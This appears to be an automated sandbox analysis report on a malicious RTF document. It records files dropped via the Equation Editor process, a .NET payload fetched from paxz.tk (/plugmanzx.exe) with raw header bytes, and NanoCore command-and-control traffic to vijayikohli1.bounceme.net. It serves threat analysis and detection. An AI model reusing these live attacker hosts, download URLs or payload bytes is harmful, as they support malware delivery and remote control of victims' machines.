                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FIY27LSZ1R4X92P268IK.temp

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.583360878315553
                Encrypted:false
                SSDEEP:96:chQCQMqKqvsqvJCwo4z8hQCQMqKqvsEHyqvJCworqzavKrdHXpxpyMGlUVWA2:cWzo4z8WnHnorqzaClf8MwA2
                MD5:297F7633323831197F095937ECF093C0
                SHA1:59372DBF5C1C2C53013EA4D2572B8316B8D1B29B
                SHA-256:75ECF71F0A9B2B42E522DA399C7D4FD8335186697CFAC7EF7004A2C39DB49C4B
                SHA-512:3D7574668AD564375BD251D773A8FAA7503BBB16CD7487EFDBB8DACAC0215680D2AD3EA8225BE016E6D01D9F025E8E86A639D1145AB57062AE65EDCACB203F8A
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.583360878315553
                Encrypted:false
                SSDEEP:96:chQCQMqKqvsqvJCwo4z8hQCQMqKqvsEHyqvJCworqzavKrdHXpxpyMGlUVWA2:cWzo4z8WnHnorqzaClf8MwA2
                MD5:297F7633323831197F095937ECF093C0
                SHA1:59372DBF5C1C2C53013EA4D2572B8316B8D1B29B
                SHA-256:75ECF71F0A9B2B42E522DA399C7D4FD8335186697CFAC7EF7004A2C39DB49C4B
                SHA-512:3D7574668AD564375BD251D773A8FAA7503BBB16CD7487EFDBB8DACAC0215680D2AD3EA8225BE016E6D01D9F025E8E86A639D1145AB57062AE65EDCACB203F8A
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                C:\Users\user\AppData\Roaming\ZdNnwVcb.exe

                Download File
                Process:C:\Users\user\AppData\Roaming\plugmancdht5461.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):473088
                Entropy (8bit):7.83796766223819
                Encrypted:false
                SSDEEP:12288:d3jmSsNIXVfqxWnvkrWOzAG30uYs8VGriQ:dySsNFcGzkJV
                MD5:7031570AA150B893F68A32900327B2AE
                SHA1:CAEB6580B9D33EEDEA97C7775AD0853A33A59B3A
                SHA-256:F515A9D2910DA428D7803AFC2244476A5B185F30361482CC1DD49670513281A5
                SHA-512:CFA535B9A5931D41E2177447D6A255ACFB97BA4A0672A776CD6B741515DD9F473CD834A8E119BD096934B954590A2368EECF62A1953C77A5DF7B8AB8152A8773
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 40%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.a..............0..,...........J... ...`....@.. ....................................@.................................<J..O....`.. ............................................................................ ............... ..H............text....*... ...,.................. ..`.rsrc... ....`......................@..@.reloc...............6..............@..B................pJ......H.......`..........0...(...8............................................................................0..........*....0...........{....*..0............}....*.0..N........ =.G. ....a%..^E....'...............+%.{...... .*.Z ....a+.. ..T.Z ....a+..*...0..;........ TQs. c]i.a%..^E................+..{...... v._.Z w...a+..*..0.............}....*....0..;.........{..... .. .GJ.a%..^E................+.. x~..Z ...a+..*..0............}......}.....(!... ..$. .1.Wa%...^E....-......

                C:\Users\user\AppData\Roaming\plugmancdht5461.exe

                Download File
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):473088
                Entropy (8bit):7.83796766223819
                Encrypted:false
                SSDEEP:12288:d3jmSsNIXVfqxWnvkrWOzAG30uYs8VGriQ:dySsNFcGzkJV
                MD5:7031570AA150B893F68A32900327B2AE
                SHA1:CAEB6580B9D33EEDEA97C7775AD0853A33A59B3A
                SHA-256:F515A9D2910DA428D7803AFC2244476A5B185F30361482CC1DD49670513281A5
                SHA-512:CFA535B9A5931D41E2177447D6A255ACFB97BA4A0672A776CD6B741515DD9F473CD834A8E119BD096934B954590A2368EECF62A1953C77A5DF7B8AB8152A8773
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 40%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.a..............0..,...........J... ...`....@.. ....................................@.................................<J..O....`.. ............................................................................ ............... ..H............text....*... ...,.................. ..`.rsrc... ....`......................@..@.reloc...............6..............@..B................pJ......H.......`..........0...(...8............................................................................0..........*....0...........{....*..0............}....*.0..N........ =.G. ....a%..^E....'...............+%.{...... .*.Z ....a+.. ..T.Z ....a+..*...0..;........ TQs. c]i.a%..^E................+..{...... v._.Z w...a+..*..0.............}....*....0..;.........{..... .. .GJ.a%..^E................+.. x~..Z ...a+..*..0............}......}.....(!... ..$. .1.Wa%...^E....-......

                C:\Users\user\Desktop\~$C_MDR0307_019.doc

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                Malicious:false
                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                Static File Info

                General

                File type:Rich Text Format data, unknown version
                Entropy (8bit):4.100978963404899
                TrID:
                • Rich Text Format (5005/1) 55.56%
                • Rich Text Format (4004/1) 44.44%
                File name:DOC_MDR0307_019.doc
                File size:445364
                MD5:0f99f373718685c0235b20df7624b00c
                SHA1:1ed1e0a6b306bf8bee39628cfcfa2f8e683bec77
                SHA256:adc82a58d8c890881cc7781be8e831b948dc06757664946ca302f2ef5200bd38
                SHA512:62894abff24ee8fc5309cc4afad29fe43a919651f64b9a480a79a4f8baee8f05fc8da5beda1cf529e521486de854db0070b36c89d505c4fa6566136d4394a5c1
                SSDEEP:12288:trN45zrtgVRUXpJLGE1tn2uwBC1voAUq0uOl63XmAf6/oq:L45zrtgVRUXnqy92wOq0plCXmAf6/7
                File Content Preview:{\rtf92340@]'?/57_4.(@?9!3.=3$3?<%?60-'3+@3.5/>?(?(,=?53&!2.6$??!:`(=@2~=>+([|8>?.%<|2??><%+3:]+%?|_/)@.&:?04$<3)].<6?%&._?,.*@?:,:4%?1#?76:?^>?^%]>,?%`2]`27<~?|%?^%|.0>%!2^8^(!&6_#?`^/?5)5@*;7@`':::<.1[.~?,~;=:8~9`?#|$^?.%..!''>*???$28^69???3-(%^$.+]@.6_

                File Icon

                Icon Hash:e4eea2aaa4b4b4a4

                Static RTF Info

                Objects

                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                00000181Chno
                1000017DChno

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                01/24/22-15:31:33.307731UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22
                01/24/22-15:31:33.672663TCP2025019ET TROJAN Possible NanoCore C2 60B491663132192.168.2.22103.153.78.234
                01/24/22-15:31:39.731274UDP254DNS SPOOF query response with TTL of 1 min. and no authority53578058.8.8.8192.168.2.22
                01/24/22-15:31:39.958267TCP2025019ET TROJAN Possible NanoCore C2 60B491673132192.168.2.22103.153.78.234
                01/24/22-15:31:45.875524UDP254DNS SPOOF query response with TTL of 1 min. and no authority53590308.8.8.8192.168.2.22
                01/24/22-15:31:46.170779TCP2025019ET TROJAN Possible NanoCore C2 60B491683132192.168.2.22103.153.78.234
                01/24/22-15:32:06.055263UDP254DNS SPOOF query response with TTL of 1 min. and no authority53591858.8.8.8192.168.2.22
                01/24/22-15:32:06.283296TCP2025019ET TROJAN Possible NanoCore C2 60B491693132192.168.2.22103.153.78.234
                01/24/22-15:32:12.561281TCP2025019ET TROJAN Possible NanoCore C2 60B491703132192.168.2.22103.153.78.234
                01/24/22-15:32:18.755322TCP2025019ET TROJAN Possible NanoCore C2 60B491713132192.168.2.22103.153.78.234
                01/24/22-15:32:40.087004TCP2025019ET TROJAN Possible NanoCore C2 60B491723132192.168.2.22103.153.78.234
                01/24/22-15:32:45.788752UDP254DNS SPOOF query response with TTL of 1 min. and no authority53598678.8.8.8192.168.2.22
                01/24/22-15:32:46.021979TCP2025019ET TROJAN Possible NanoCore C2 60B491733132192.168.2.22103.153.78.234
                01/24/22-15:32:52.111741TCP2025019ET TROJAN Possible NanoCore C2 60B491743132192.168.2.22103.153.78.234
                01/24/22-15:33:16.429569UDP254DNS SPOOF query response with TTL of 1 min. and no authority53500728.8.8.8192.168.2.22
                01/24/22-15:33:16.666425TCP2025019ET TROJAN Possible NanoCore C2 60B491763132192.168.2.22103.153.78.234
                01/24/22-15:33:22.506894UDP254DNS SPOOF query response with TTL of 1 min. and no authority53543048.8.8.8192.168.2.22
                01/24/22-15:33:22.745018TCP2025019ET TROJAN Possible NanoCore C2 60B491773132192.168.2.22103.153.78.234
                01/24/22-15:33:28.241252TCP2025019ET TROJAN Possible NanoCore C2 60B491783132192.168.2.22103.153.78.234

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jan 24, 2022 15:31:19.033679962 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.060758114 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.060911894 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.061299086 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.087913036 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088403940 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088427067 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088439941 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088455915 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088471889 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088489056 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088505983 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088526011 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088541985 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.088546991 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088574886 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.088581085 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.088584900 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.088587999 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.088591099 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.088610888 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115274906 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115307093 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115324020 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115339994 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115346909 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115360022 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115380049 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115389109 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115396023 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115398884 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115402937 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115410089 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115421057 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115428925 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115439892 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115457058 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115463972 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115473986 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115478039 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115493059 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115493059 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115509987 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115518093 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115530968 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115533113 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115550995 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115551949 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115567923 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115586042 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115586042 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115597010 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115603924 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115607023 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115621090 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115626097 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115638971 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.115641117 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115659952 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.115670919 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.122791052 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144242048 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144288063 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144313097 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144315004 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144340992 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144345999 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144356966 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144383907 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144388914 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144397974 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144421101 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144427061 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144434929 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144454956 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144460917 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144483089 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144493103 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144512892 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144516945 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144547939 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144551039 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144561052 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144587994 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144603968 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144614935 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144618034 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144642115 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144649982 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144670963 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144674063 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144700050 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144706964 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144723892 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144726038 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144756079 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144763947 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144783974 CET80491652.58.149.41192.168.2.22
                Jan 24, 2022 15:31:19.144793987 CET4916580192.168.2.222.58.149.41
                Jan 24, 2022 15:31:19.144810915 CET80491652.58.149.41192.168.2.22

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jan 24, 2022 15:31:18.952415943 CET5216753192.168.2.228.8.8.8
                Jan 24, 2022 15:31:18.971262932 CET53521678.8.8.8192.168.2.22
                Jan 24, 2022 15:31:18.971574068 CET5216753192.168.2.228.8.8.8
                Jan 24, 2022 15:31:18.990772009 CET53521678.8.8.8192.168.2.22
                Jan 24, 2022 15:31:33.288619041 CET5059153192.168.2.228.8.8.8
                Jan 24, 2022 15:31:33.307730913 CET53505918.8.8.8192.168.2.22
                Jan 24, 2022 15:31:39.704605103 CET5780553192.168.2.228.8.8.8
                Jan 24, 2022 15:31:39.731273890 CET53578058.8.8.8192.168.2.22
                Jan 24, 2022 15:31:45.854558945 CET5903053192.168.2.228.8.8.8
                Jan 24, 2022 15:31:45.875524044 CET53590308.8.8.8192.168.2.22
                Jan 24, 2022 15:32:06.034229040 CET5918553192.168.2.228.8.8.8
                Jan 24, 2022 15:32:06.055263042 CET53591858.8.8.8192.168.2.22
                Jan 24, 2022 15:32:12.310916901 CET5561653192.168.2.228.8.8.8
                Jan 24, 2022 15:32:12.330322981 CET53556168.8.8.8192.168.2.22
                Jan 24, 2022 15:32:18.447238922 CET4997253192.168.2.228.8.8.8
                Jan 24, 2022 15:32:18.464929104 CET53499728.8.8.8192.168.2.22
                Jan 24, 2022 15:32:39.846950054 CET5177153192.168.2.228.8.8.8
                Jan 24, 2022 15:32:39.866324902 CET53517718.8.8.8192.168.2.22
                Jan 24, 2022 15:32:45.768023014 CET5986753192.168.2.228.8.8.8
                Jan 24, 2022 15:32:45.788752079 CET53598678.8.8.8192.168.2.22
                Jan 24, 2022 15:32:51.847006083 CET5031553192.168.2.228.8.8.8
                Jan 24, 2022 15:32:51.866321087 CET53503158.8.8.8192.168.2.22
                Jan 24, 2022 15:33:16.410244942 CET5007253192.168.2.228.8.8.8
                Jan 24, 2022 15:33:16.429569006 CET53500728.8.8.8192.168.2.22
                Jan 24, 2022 15:33:22.485915899 CET5430453192.168.2.228.8.8.8
                Jan 24, 2022 15:33:22.506894112 CET53543048.8.8.8192.168.2.22
                Jan 24, 2022 15:33:27.990884066 CET4989453192.168.2.228.8.8.8
                Jan 24, 2022 15:33:28.009027004 CET53498948.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Jan 24, 2022 15:31:18.952415943 CET192.168.2.228.8.8.80xe630Standard query (0)paxz.tkA (IP address)IN (0x0001)
                Jan 24, 2022 15:31:18.971574068 CET192.168.2.228.8.8.80xe630Standard query (0)paxz.tkA (IP address)IN (0x0001)
                Jan 24, 2022 15:31:33.288619041 CET192.168.2.228.8.8.80xbb0cStandard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:31:39.704605103 CET192.168.2.228.8.8.80x7163Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:31:45.854558945 CET192.168.2.228.8.8.80x315aStandard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:32:06.034229040 CET192.168.2.228.8.8.80x8bd1Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:32:12.310916901 CET192.168.2.228.8.8.80x3885Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:32:18.447238922 CET192.168.2.228.8.8.80x1941Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:32:39.846950054 CET192.168.2.228.8.8.80x6993Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:32:45.768023014 CET192.168.2.228.8.8.80xc645Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:32:51.847006083 CET192.168.2.228.8.8.80xecedStandard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:33:16.410244942 CET192.168.2.228.8.8.80x3ef5Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:33:22.485915899 CET192.168.2.228.8.8.80x5c0cStandard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                Jan 24, 2022 15:33:27.990884066 CET192.168.2.228.8.8.80xd6a1Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Jan 24, 2022 15:31:18.971262932 CET8.8.8.8192.168.2.220xe630No error (0)paxz.tk2.58.149.41A (IP address)IN (0x0001)
                Jan 24, 2022 15:31:18.990772009 CET8.8.8.8192.168.2.220xe630No error (0)paxz.tk2.58.149.41A (IP address)IN (0x0001)
                Jan 24, 2022 15:31:33.307730913 CET8.8.8.8192.168.2.220xbb0cNo error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:31:39.731273890 CET8.8.8.8192.168.2.220x7163No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:31:45.875524044 CET8.8.8.8192.168.2.220x315aNo error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:32:06.055263042 CET8.8.8.8192.168.2.220x8bd1No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:32:12.330322981 CET8.8.8.8192.168.2.220x3885No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:32:18.464929104 CET8.8.8.8192.168.2.220x1941No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:32:39.866324902 CET8.8.8.8192.168.2.220x6993No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:32:45.788752079 CET8.8.8.8192.168.2.220xc645No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:32:51.866321087 CET8.8.8.8192.168.2.220xecedNo error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:33:16.429569006 CET8.8.8.8192.168.2.220x3ef5No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:33:22.506894112 CET8.8.8.8192.168.2.220x5c0cNo error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                Jan 24, 2022 15:33:28.009027004 CET8.8.8.8192.168.2.220xd6a1No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • paxz.tk

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.22491652.58.149.4180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                TimestampkBytes transferredDirectionData
                Jan 24, 2022 15:31:19.061299086 CET0OUTGET /plugmanzx.exe HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: paxz.tk
                Connection: Keep-Alive
                Jan 24, 2022 15:31:19.088403940 CET2INHTTP/1.1 200 OK
                Date: Mon, 24 Jan 2022 14:31:19 GMT
                Server: Apache
                Last-Modified: Mon, 24 Jan 2022 10:15:50 GMT
                ETag: "73800-5d65140bd6d4a"
                Accept-Ranges: bytes
                Content-Length: 473088
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/octet-stream
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 07 7b ee 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2c 07 00 00 0a 00 00 00 00 00 00 8e 4a 07 00 00 20 00 00 00 60 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 4a 07 00 4f 00 00 00 00 60 07 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 2a 07 00 00 20 00 00 00 2c 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 06 00 00 00 60 07 00 00 08 00 00 00 2e 07 00 00 00 00 00 00 